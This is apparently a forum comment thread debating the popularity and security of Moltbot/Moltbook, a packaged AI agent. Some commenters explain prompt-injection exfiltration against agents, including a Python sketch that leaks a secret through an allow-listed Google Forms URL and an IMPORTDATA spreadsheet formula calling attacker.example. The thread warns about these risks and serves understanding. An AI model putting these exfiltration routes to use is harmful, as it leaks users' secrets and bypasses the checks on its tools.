Comment by SimianSci

10 hours ago

I was quite stunned at the success of Moltbot/Moltbook, but I think I'm starting to understand it better these days. Most of Moltbook's success rides on the "prepackaged" aspect of its agent. It's a jump in accessibility for general audiences, who are paying a lot more attention to the tech sector than in previous decades. Most of the people paying attention to this space don't have the technical capabilities that many engineers do, so a highly prescriptive "buy a Mac mini, copy a couple of lines to install" appeals greatly, especially as this will be the first "agent" many of them will have interacted with.

The landscape of security was bad long before the metaphorical "unwashed masses" got hold of it. Now it's quite alarming, as there are waves of non-technical users doing the bare minimum to try and keep up to date with the growing hype.

The security nightmare happening here might end up being more persistent than we realize.

Is it a success? What would that mean, for a social media site that isn't meant for humans?

The site has 1.5 million agents but only 17,000 human "owners" (per Wiz's analysis of the leak).

It's going viral because some high-profile tastemakers (Scott Alexander and Andrej Karpathy) have discussed/tweeted about it, and a few other unscrupulous people are sharing alarming-looking things out of context and doing numbers.

  • > What would that mean, for a social media site that isn't meant for humans?

    For a social media site that isn't meant for humans, some humans seem to enjoy it a lot, albeit indirectly.

    • This is the equivalent of a toddler being entertained by the sound the straps on their Velcro shoes make when they get peeled back and forth.

That's a bit of an understatement. Every single LLM is 100% vulnerable by design. There is no way to close the hole. Simple mitigations like "allow lists" can be trivially worked around, either by prompt injection, or by the AI just deciding to work around it itself (reward hacking). The only solution is to segregate the LLM from all external input, and prevent it from making outbound network calls. And though MCPs and jails are the beginning of a mitigation for it, it gets worse: the AI can write obfuscated backdoors and slip them into your vibe-coded apps, either as code, or instructions to be executed by LLM later.

It's a machine designed to fight all your attempts to make it secure.
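
To make that concrete, here's a minimal sketch of why an allow list alone doesn't close the hole (hypothetical hosts and secrets; not any real framework's API):

```python
from urllib.parse import urlparse

# Naive mitigation: only let the agent fetch allow-listed hosts.
ALLOWED_HOSTS = {"api.github.com", "docs.google.com"}

def is_allowed(url: str) -> bool:
    return urlparse(url).hostname in ALLOWED_HOSTS

# An injected prompt doesn't need a forbidden host; it only needs to
# persuade the model to fold a secret into a request to an allowed one,
# e.g. a public Google Form's submission endpoint.
secret = "AWS_SECRET_ACCESS_KEY=..."  # anything the agent can read
exfil = f"https://docs.google.com/forms/d/e/FORM_ID/formResponse?entry.1={secret}"

assert is_allowed(exfil)  # the check passes; the data still leaves
```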

  • ya... the number of ways to infiltrate a malicious prompt and exfil data is overwhelming, almost unlimited. Any tool that can hit an arbitrary URL or make a DNS request is basically an exfil path.

    I recently did a test of a system that was triggered off email and had access to write to Google Sheets. Easy exfil via `IMPORTDATA` (sketched below), but there are probably hundreds of ways to do it.
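
    Roughly what that looked like, with a made-up attacker URL (`IMPORTDATA` really does make Google's servers fetch a URL; everything else here is an illustrative sketch, not the actual system I tested):

    ```python
    # Hypothetical sketch of the IMPORTDATA exfil path. If injected email
    # text can get the agent to write a formula into a sheet, Google's
    # servers fetch the URL, and the data leaves via the GET request.
    leaked = "whatever-the-injected-prompt-told-the-agent-to-collect"
    cell_value = f'=IMPORTDATA("https://attacker.example/log?d={leaked}")'
    # The agent writes cell_value into a cell with whatever Sheets tool it
    # has; no suspicious host ever shows up in the agent's own network
    # traffic, because Google performs the fetch when the formula evaluates.
    ```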

  • Moltbot is not de rigueur prompt injection, i.e. the "is it instructions or data?" built-in vulnerability.

    This was "I'm going to release an open agent with an open agents directory with executable code, and it'll operate your personal computer remotely!" I deeply understand the impulse, but there's a fine line between "cutting edge" and "irresponsible & making excuses."

    I'm uncertain which side I would place it on.

    I have a soft spot for the author, and a sinking feeling that without the soft spot, I'd certainly choose "irresponsible".

"Buy a Mac mini, copy a couple of lines to install" is marketing fluff. It's incredibly easy to trip Moltbot into a config error, and its context management is also a total mess. The agent will outright forget the last 3 messages after compaction occurs, even though the logs are available on disk. Finally, it never remembers instructions properly.

Overall, it's a good idea but incredibly rough due to what I assume is heavy vibe coding.
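
If I had to guess, the compaction bug smells like a slice from the wrong end of the transcript. A minimal sketch of that failure mode (pure speculation about Moltbot's internals, not its actual code):

```python
def summarize(turns: list[str]) -> str:
    # Stand-in for whatever summarization the agent runs at compaction.
    return f"[summary of {len(turns)} earlier turns]"

def compact(history: list[str], keep: int = 50) -> list[str]:
    if len(history) <= keep:
        return history
    # BUG: history[:keep] keeps the *oldest* turns, so the agent
    # "forgets" its most recent messages even though the full log is
    # still on disk. The fix is to keep history[-keep:] instead.
    return [summarize(history[:-keep])] + history[:keep]
```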

I agree with the prepackaging aspect, cf. HN's dismissal of Dropbox. Meanwhile, the global enterprise with all its might has not been able to stop high-profile hacks/data leaks from happening. I don't think people will cry over a misconfigured Supabase database. It's nothing worse than what's already out there.

Sure, everybody wants security, and that's what they'll say, but does that really translate to reduced perceived value of vibe-coding tools? I haven't seen evidence that it does.

  • I agree that people will pick the marginal value of a tool over the security that comes from not using it. Security has always been invisible to the public. But I'm reminded of earlier botnets (Mirai being the best-known example) that simply took advantage of the millions of routers and IoT devices whose logins were never configured beyond the default admin credentials. Those same botnets have been used as tools to enable crimes across the globe. Having swarms of agent-based systems out there operated by non-technical users could lead to an evolution of the "botnet" far more capable than previous ones.

    I've not quite convinced myself this is where we're headed, but there are signs that make me worry that systems such as Moltbot will further enable the ascendancy of global crime and corruption.

Is it actually a success, or are people just talking about it a lot?

  • Kind of feels like many see "people are talking about it a lot" as the same thing as "success," in this and many other cases, which I'm not sure I agree with.

    As far as I can tell, since agents are using Moltbook, it's a success of sorts already, as in it "has users"; otherwise I'm not really sure what success looks like for a budding hivemind.

> It's a jump in accessibility for general audiences, who are paying a lot more attention to the tech sector than in previous decades.

Oh totally, both my wife and one of my brothers have, independently, started watching YouTube vids about vibe coding. They register domain names and let AI run wild with little games and tools. And now they're talking to me all day long about agents.

> Most of the people paying attention to this space don't have the technical capabilities ...

It's just anecdata on my side, but I fully agree.

> The security nightmare happening here might end up being more persistent than we realize.

I'm sure we're in for a good laugh. It's already started: TFA is eye-opening. And funny, too.